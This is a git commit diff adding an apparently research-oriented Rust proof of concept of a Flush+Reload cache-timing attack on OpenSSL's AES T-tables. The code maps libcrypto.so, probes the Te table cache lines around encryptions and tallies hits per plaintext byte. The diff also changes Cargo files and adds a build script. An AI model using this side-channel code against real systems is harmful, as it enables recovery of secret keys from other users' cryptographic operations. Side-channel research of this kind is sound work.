First version of aes T table attack - using flush and reload naively

2020-08-19 10:07:48 +02:00 · 2020-08-19 10:07:48 +02:00 · 0819eef0c0
commit 0819eef0c0
parent b458204f79
6 changed files with 407 additions and 2 deletions
--- a/Cargo.lock
+++ b/Cargo.lock
@ -3,6 +3,13 @@
 [[package]]
 name = "aes-t-tables"
 version = "0.1.0"
 dependencies = [
 "cache_utils 0.1.0",
 "memmap2 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)",
 "openssl 0.10.30 (registry+https://github.com/rust-lang/crates.io-index)",
 "openssl-sys 0.9.58 (registry+https://github.com/rust-lang/crates.io-index)",
 "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)",
 ]
 [[package]]
 name = "ahash"
@ -100,6 +107,29 @@ name = "either"
 version = "1.5.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 [[package]]
 name = "foreign-types"
 version = "0.3.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 dependencies = [
 "foreign-types-shared 0.1.1 (registry+https://github.com/rust-lang/crates.io-index)",
 ]
 [[package]]
 name = "foreign-types-shared"
 version = "0.1.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 [[package]]
 name = "getrandom"
 version = "0.1.14"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 dependencies = [
 "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)",
 "libc 0.2.69 (registry+https://github.com/rust-lang/crates.io-index)",
 "wasi 0.9.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)",
 ]
 [[package]]
 name = "hashbrown"
 version = "0.8.0"
@ -146,6 +176,14 @@ dependencies = [
 "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)",
 ]
 [[package]]
 name = "memmap2"
 version = "0.1.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 dependencies = [
 "libc 0.2.69 (registry+https://github.com/rust-lang/crates.io-index)",
 ]
 [[package]]
 name = "nix"
 version = "0.17.0"
@ -158,6 +196,36 @@ dependencies = [
 "void 1.0.2 (registry+https://github.com/rust-lang/crates.io-index)",
 ]
 [[package]]
 name = "openssl"
 version = "0.10.30"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 dependencies = [
 "bitflags 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)",
 "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)",
 "foreign-types 0.3.2 (registry+https://github.com/rust-lang/crates.io-index)",
 "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
 "libc 0.2.69 (registry+https://github.com/rust-lang/crates.io-index)",
 "openssl-sys 0.9.58 (registry+https://github.com/rust-lang/crates.io-index)",
 ]
 [[package]]
 name = "openssl-sys"
 version = "0.9.58"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 dependencies = [
 "autocfg 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
 "cc 1.0.50 (registry+https://github.com/rust-lang/crates.io-index)",
 "libc 0.2.69 (registry+https://github.com/rust-lang/crates.io-index)",
 "pkg-config 0.3.18 (registry+https://github.com/rust-lang/crates.io-index)",
 "vcpkg 0.2.10 (registry+https://github.com/rust-lang/crates.io-index)",
 ]
 [[package]]
 name = "pkg-config"
 version = "0.3.18"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 [[package]]
 name = "polling_serial"
 version = "0.1.0"
@ -167,6 +235,48 @@ dependencies = [
 "x86_64 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)",
 ]
 [[package]]
 name = "ppv-lite86"
 version = "0.2.8"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 [[package]]
 name = "rand"
 version = "0.7.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 dependencies = [
 "getrandom 0.1.14 (registry+https://github.com/rust-lang/crates.io-index)",
 "libc 0.2.69 (registry+https://github.com/rust-lang/crates.io-index)",
 "rand_chacha 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)",
 "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)",
 "rand_hc 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)",
 ]
 [[package]]
 name = "rand_chacha"
 version = "0.2.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 dependencies = [
 "ppv-lite86 0.2.8 (registry+https://github.com/rust-lang/crates.io-index)",
 "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)",
 ]
 [[package]]
 name = "rand_core"
 version = "0.5.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 dependencies = [
 "getrandom 0.1.14 (registry+https://github.com/rust-lang/crates.io-index)",
 ]
 [[package]]
 name = "rand_hc"
 version = "0.2.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 dependencies = [
 "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)",
 ]
 [[package]]
 name = "scopeguard"
 version = "1.1.0"
@ -190,6 +300,11 @@ name = "static_assertions"
 version = "1.1.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 [[package]]
 name = "vcpkg"
 version = "0.2.10"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 [[package]]
 name = "vga_buffer"
 version = "0.1.0"
@ -209,6 +324,11 @@ name = "volatile"
 version = "0.2.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 [[package]]
 name = "wasi"
 version = "0.9.0+wasi-snapshot-preview1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 [[package]]
 name = "x86_64"
 version = "0.11.0"
@ -230,17 +350,31 @@ dependencies = [
 "checksum cc 1.0.50 (registry+https://github.com/rust-lang/crates.io-index)" = "95e28fa049fda1c330bcf9d723be7663a899c4679724b34c81e9f5a326aab8cd"
 "checksum cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)" = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822"
 "checksum either 1.5.3 (registry+https://github.com/rust-lang/crates.io-index)" = "bb1f6b1ce1c140482ea30ddd3335fc0024ac7ee112895426e0a629a6c20adfe3"
 "checksum foreign-types 0.3.2 (registry+https://github.com/rust-lang/crates.io-index)" = "f6f339eb8adc052cd2ca78910fda869aefa38d22d5cb648e6485e4d3fc06f3b1"
 "checksum foreign-types-shared 0.1.1 (registry+https://github.com/rust-lang/crates.io-index)" = "00b0228411908ca8685dba7fc2cdd70ec9990a6e753e89b6ac91a84c40fbaf4b"
 "checksum getrandom 0.1.14 (registry+https://github.com/rust-lang/crates.io-index)" = "7abc8dd8451921606d809ba32e95b6111925cd2906060d2dcc29c070220503eb"
 "checksum hashbrown 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ab9b7860757ce258c89fd48d28b68c41713e597a7b09e793f6c6a6e2ea37c827"
 "checksum itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b"
 "checksum lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646"
 "checksum libc 0.2.69 (registry+https://github.com/rust-lang/crates.io-index)" = "99e85c08494b21a9054e7fe1374a732aeadaff3980b6990b94bfd3a70f690005"
 "checksum linked_list_allocator 0.8.4 (registry+https://github.com/rust-lang/crates.io-index)" = "e70e46c13c0e8374c26cec5752e3347ca1087d9711de8f45aa513a7700efd73d"
 "checksum lock_api 0.3.3 (registry+https://github.com/rust-lang/crates.io-index)" = "79b2de95ecb4691949fea4716ca53cdbcfccb2c612e19644a8bad05edcf9f47b"
 "checksum memmap2 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "d9b70ca2a6103ac8b665dc150b142ef0e4e89df640c9e6cf295d189c3caebe5a"
 "checksum nix 0.17.0 (registry+https://github.com/rust-lang/crates.io-index)" = "50e4785f2c3b7589a0d0c1dd60285e1188adac4006e8abd6dd578e1567027363"
 "checksum openssl 0.10.30 (registry+https://github.com/rust-lang/crates.io-index)" = "8d575eff3665419f9b83678ff2815858ad9d11567e082f5ac1814baba4e2bcb4"
 "checksum openssl-sys 0.9.58 (registry+https://github.com/rust-lang/crates.io-index)" = "a842db4709b604f0fe5d1170ae3565899be2ad3d9cbc72dedc789ac0511f78de"
 "checksum pkg-config 0.3.18 (registry+https://github.com/rust-lang/crates.io-index)" = "d36492546b6af1463394d46f0c834346f31548646f6ba10849802c9c9a27ac33"
 "checksum ppv-lite86 0.2.8 (registry+https://github.com/rust-lang/crates.io-index)" = "237a5ed80e274dbc66f86bd59c1e25edc039660be53194b5fe0a482e0f2612ea"
 "checksum rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)" = "6a6b1679d49b24bbfe0c803429aa1874472f50d9b363131f0e89fc356b544d03"
 "checksum rand_chacha 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)" = "f4c8ed856279c9737206bf725bf36935d8666ead7aa69b52be55af369d193402"
 "checksum rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)" = "90bde5296fc891b0cef12a6d03ddccc162ce7b2aff54160af9338f8d40df6d19"
 "checksum rand_hc 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ca3129af7b92a17112d59ad498c6f81eaf463253766b90396d39ea7a39d6613c"
 "checksum scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd"
 "checksum spin 0.5.2 (registry+https://github.com/rust-lang/crates.io-index)" = "6e63cff320ae2c57904679ba7cb63280a3dc4613885beafb148ee7bf9aa9042d"
 "checksum spinning_top 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "32d801a3a53bcf5071f85fef8d5cab9e5f638fc5580a37e6eb7aba4b37438d24"
 "checksum static_assertions 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f"
 "checksum vcpkg 0.2.10 (registry+https://github.com/rust-lang/crates.io-index)" = "6454029bf181f092ad1b853286f23e2c507d8e8194d01d92da4a55c274a5508c"
 "checksum void 1.0.2 (registry+https://github.com/rust-lang/crates.io-index)" = "6a02e4885ed3bc0f2de90ea6dd45ebcbb66dacffe03547fadbb0eeae2770887d"
 "checksum volatile 0.2.6 (registry+https://github.com/rust-lang/crates.io-index)" = "6af0edf5b4faacc31fc51159244d78d65ec580f021afcef7bd53c04aeabc7f29"
 "checksum wasi 0.9.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)" = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519"
 "checksum x86_64 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "365de37eb7c6da582cbb510dd0f3f1235d24ff6309a8a96e8a9909cc9bfd608f"
--- a/aes-t-tables/.cargo/config
+++ b/aes-t-tables/.cargo/config
@ -0,0 +1,2 @@
 [build]
 target = "x86_64-unknown-linux-gnu"
--- a/aes-t-tables/Cargo.toml
+++ b/aes-t-tables/Cargo.toml
@ -7,3 +7,8 @@ edition = "2018"
 # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 [dependencies]
 openssl-sys = "0.9.58"
 openssl = "0.10.30"
 cache_utils = { path = "../cache_utils" }
 memmap2 = "0.1.0"
 rand = "0.7.3"
--- a/aes-t-tables/cargo.sh
+++ b/aes-t-tables/cargo.sh
@ -0,0 +1,7 @@
 #/bin/bash
 export OPENSSL_DIR=$(readlink -f ../../../openssl)
 export X86_64_UNKNOWN_LINUX_GNU_OPENSSL_DIR=$OPENSSL_DIR
 export PKG_CONFIG_PATH=$OPENSSL_DIR
 export X86_64_UNKNOWN_LINUX_GNU_PKG_CONFIG_PATH=$OPENSSL_DIR
 export LD_LIBRARY_PATH=$OPENSSL_DIR
 cargo "$@"
--- a/aes-t-tables/src/lib.rs
+++ b/aes-t-tables/src/lib.rs
@ -1,3 +1,15 @@
 use openssl::aes;
 use crate::CacheStatus::Hit;
 use memmap2::Mmap;
 use openssl::aes::aes_ige;
 use openssl::symm::Mode;
 use std::collections::HashMap;
 use std::fmt::Debug;
 use std::fs::File;
 use std::path::Path;
 use std::sync::Arc;
 // Generic AES T-table attack flow
 // Modularisation :
@ -19,3 +31,181 @@
 // an attacker measurement
 // a calibration victim
 #[derive(Debug, PartialEq, Eq)]
 pub enum CacheStatus {
    Hit,
    Miss,
 }
 pub enum SideChannelError<T> {
    NeedRecalibration,
    FatalError(T),
 }
 /*
 pub enum CacheSideChannel {
    SingleAddr,
    MultipleAddr,
 }
 */
 // Access Driven
 pub trait SimpleCacheSideChannel {
    // TODO
 }
 pub trait TableCacheSideChannel {
    type ChannelFatalError: Debug;
    fn attack<'a, 'b, 'c>(
        &'a mut self,
        addresses: impl IntoIterator<Item = *const u8>,
        victim: &'c dyn Fn(),
    ) -> Result<Vec<(*const u8, CacheStatus)>, Self::ChannelFatalError>;
 }
 pub trait SingleAddrCacheSideChannel: Debug {
    type ChannelFatalError: Debug;
    fn test(
        &mut self,
        addr: *const u8,
    ) -> Result<CacheStatus, SideChannelError<Self::ChannelFatalError>>;
    fn prepare(&mut self, addr: *const u8);
    fn victim(&mut self, operation: &dyn Fn());
    fn calibrate(
        &mut self,
        addresses: impl IntoIterator<Item = *const u8>,
    ) -> Result<(), Self::ChannelFatalError>;
 }
 /*
 pub trait MultipleAddrCacheSideChannel: Debug {
    type ChannelFatalError: Debug;
    fn test<'a>(
        &self,
        addresses: impl IntoIterator<Item = &'a *const u8>,
    ) -> Result<Vec<CacheStatus>, SideChannelError<Self::ChannelFatalError>>;
    fn prepare<'a>(addresses: impl IntoIterator<Item = &'a *const u8>);
    fn victim<T>(&self, operation: Box<dyn FnOnce() -> T>) -> T;
    fn recalibrate(self) -> Result<Self, Self::ChannelFatalError>;
    fn calibrate<'a>(
        params: Self::Params,
        addresses: impl IntoIterator<Item = &'a *const u8>,
    ) -> Result<Self, Self::ChannelFatalError>;
 }
 */
 impl<T: SingleAddrCacheSideChannel> TableCacheSideChannel for T {
    type ChannelFatalError = T::ChannelFatalError;
    fn attack<'a, 'b, 'c>(
        &'a mut self,
        addresses: impl IntoIterator<Item = *const u8>,
        victim: &'c dyn Fn(),
    ) -> Result<Vec<(*const u8, CacheStatus)>, Self::ChannelFatalError> {
        let mut result = Vec::new();
        for addr in addresses {
            self.prepare(addr);
            self.victim(victim);
            let r = self.test(addr);
            match r {
                Ok(status) => {
                    result.push((addr, status));
                }
                Err(e) => match e {
                    SideChannelError::NeedRecalibration => panic!(),
                    SideChannelError::FatalError(e) => {
                        return Err(e);
                    }
                },
            }
        }
        Ok(result)
    }
 }
 pub struct AESTTableParams<'a> {
    pub num_encryptions: u32,
    pub key: [u8; 32],
    pub openssl_path: &'a Path,
    pub te: [isize; 4],
 }
 const LEN: usize = (u8::max_value() as usize) + 1;
 pub fn attack_t_tables_poc(
    side_channel: &mut impl TableCacheSideChannel,
    parameters: AESTTableParams,
 ) -> () {
    // Note : This function doesn't handle the case where the address space is not shared. (Additionally you have the issue of complicated eviction sets due to complex addressing)
    // TODO
    // Possible enhancements : use ability to monitor several addresses simultaneously.
    let fd = File::open(parameters.openssl_path).unwrap();
    let mmap = unsafe { Mmap::map(&fd).unwrap() };
    let base = mmap.as_ptr();
    let te0 = unsafe { base.offset(parameters.te[0]) };
    if unsafe { (te0 as *const u64).read() } != 0xf87c7c84c66363a5 {
        panic!("Hmm This does not look like a T-table, check your address and the openssl used")
    }
    let key_struct = aes::AesKey::new_encrypt(&parameters.key).unwrap();
    //let mut plaintext = [0u8; 16];
    //let mut result = [0u8; 16];
    let mut timings: HashMap<*const u8, HashMap<u8, u32>> = HashMap::new();
    let addresses = parameters
        .te
        .iter()
        .map(|&start| ((start)..(start + 64 * 16)).step_by(64))
        .flatten()
        .map(|offset| unsafe { base.offset(offset) });
    for addr in addresses.clone() {
        timings.insert(addr, HashMap::new());
    }
    for b in (u8::min_value()..=u8::max_value()).step_by(16) {
        //plaintext[0] = b;
        eprintln!("Probing with b = {:x}", b);
        // fixme magic numbers
        let victim = || {
            let mut plaintext = [0u8; 16];
            plaintext[0] = b;
            for i in 1..plaintext.len() {
                plaintext[i] = rand::random();
            }
            let mut iv = [0u8; 32];
            let mut result = [0u8; 16];
            aes_ige(&plaintext, &mut result, &key_struct, &mut iv, Mode::Encrypt);
        };
        for i in 0..parameters.num_encryptions {
            let r = side_channel.attack(addresses.clone(), &victim);
            match r {
                Ok(v) => {
                    //println!("{:?}", v)
                    for (probe, status) in v {
                        if status == Hit {
                            *timings.get_mut(&probe).unwrap().entry(b).or_insert(0) += 1;
                        }
                    }
                }
                Err(_) => panic!("Attack failed"),
            }
        }
    }
    for probe in addresses {
        print!("{:p}", probe);
        for b in (u8::min_value()..=u8::max_value()).step_by(16) {
            print!(" {}", timings[&probe][&b]);
        }
        println!();
    }
 }
--- a/aes-t-tables/src/main.rs
+++ b/aes-t-tables/src/main.rs
@ -1,3 +1,70 @@
-fn main() {
+use aes_t_tables::{
-    println!("Hello, world!");
+    attack_t_tables_poc, AESTTableParams, CacheStatus, SideChannelError, SingleAddrCacheSideChannel,
 };
 use cache_utils::calibration::only_reload;
 use cache_utils::{flush, rdtsc_fence};
 use std::path::Path;
 #[derive(Debug)]
 struct NaiveFlushAndReload {
    pub threshold: u64,
    current: Option<*const u8>,
 }
 impl NaiveFlushAndReload {
    fn from_threshold(threshold: u64) -> Self {
        NaiveFlushAndReload {
            threshold,
            current: None,
        }
    }
 }
 impl SingleAddrCacheSideChannel for NaiveFlushAndReload {
    type ChannelFatalError = ();
    fn test(
        &mut self,
        addr: *const u8,
    ) -> Result<CacheStatus, SideChannelError<Self::ChannelFatalError>> {
        if self.current != Some(addr) {
            panic!(); // FIXME
        }
        let t = unsafe { only_reload(addr) };
        if t > self.threshold {
            Ok(CacheStatus::Miss)
        } else {
            Ok(CacheStatus::Hit)
        }
    }
    fn victim(&mut self, operation: &dyn Fn()) {
        operation()
    }
    fn calibrate(
        &mut self,
        _addresses: impl IntoIterator<Item = *const u8>,
    ) -> Result<(), Self::ChannelFatalError> {
        Ok(())
    }
    fn prepare(&mut self, addr: *const u8) {
        unsafe { flush(addr) };
        self.current = Some(addr);
    }
 }
 fn main() {
    let open_sslpath = Path::new(env!("OPENSSL_DIR")).join("lib/libcrypto.so");
    let mut side_channel = NaiveFlushAndReload::from_threshold(200);
    attack_t_tables_poc(
        &mut side_channel,
        AESTTableParams {
            num_encryptions: 10000,
            key: [0; 32],
            te: [0x1b5d40, 0x1b5940, 0x1b5540, 0x1b5140], // adjust me (should be in decreasing order)
            openssl_path: &open_sslpath,
        },
    );
 }
		`@ -0,0 +1,2 @@`
							`[build]`
							`target = "x86_64-unknown-linux-gnu"`